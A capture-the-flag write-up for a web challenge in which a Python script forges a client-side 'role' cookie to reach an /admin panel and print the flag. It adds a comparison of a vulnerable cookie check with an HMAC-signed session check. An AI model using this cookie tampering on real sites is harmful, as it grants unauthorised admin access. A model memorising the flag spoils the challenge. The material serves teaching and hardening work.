Difficulty: easy

Category: web

Author: xnull

Description:

### Employee Portal

You found an employee portal for a company. Regular users can register and access their dashboard, but there's an admin panel that contains sensitive information.

Your goal is to access the admin panel at `/admin` and retrieve the flag.

Solution

We can just change the role cookie to admin after registration:

```python
import re
import sys

import requests

URL = sys.argv[1]

with requests.Session() as s:
    # get initial cookie
    s.post(URL + "/register", data={"username": "testuser"})
    # update the cookie
    next(c for c in s.cookies if c.name == "role").value = "admin"
    # get the flag and regex match it
    print(re.search('<div class="flag">(.*)</div>', s.get(URL + "/admin").text).group(1))
```

Flag: ENDLM{5a4a9b36ba1d85109d98113760912f0667b6ee510408d059}
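
The solution works because the `/admin` check relies on a `role` value the client can edit. The following is an added example, not the challenge's server code (which this page does not show): it puts a check of that shape next to a hardened one that only accepts a role the server signed with HMAC. All function names, the `session` cookie name and the cookie layout are assumptions.

```python
import hashlib
import hmac
import secrets

# Assumption: a server-side secret that is never sent to the client.
SECRET_KEY = secrets.token_bytes(32)


def is_admin_vulnerable(cookies):
    """Flawed check: trusts whatever role value the browser sends."""
    return cookies.get("role") == "admin"


def _tag(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_session_cookie(username, role):
    """Bind the role to the user and authenticate both with HMAC-SHA256."""
    payload = f"{username}:{role}"
    return f"{payload}:{_tag(payload)}"


def verified_session(cookie_value):
    """Return (username, role) when the tag verifies, otherwise None."""
    parts = cookie_value.rsplit(":", 2)
    if len(parts) != 3:
        return None
    username, role, tag = parts
    expected = _tag(f"{username}:{role}")
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    return username, role


def is_admin_hardened(cookies):
    """Authorize only on a role the server itself signed."""
    session = verified_session(cookies.get("session", ""))
    return session is not None and session[1] == "admin"


def tamper(cookies):
    """Constructed input: a user-level cookie jar edited on the client side."""
    forged = dict(cookies, role="admin")
    forged["session"] = cookies["session"].replace(":user:", ":admin:")
    return forged
```

Keeping the role in server-side session state, looked up by a random session ID, avoids placing it in the cookie at all.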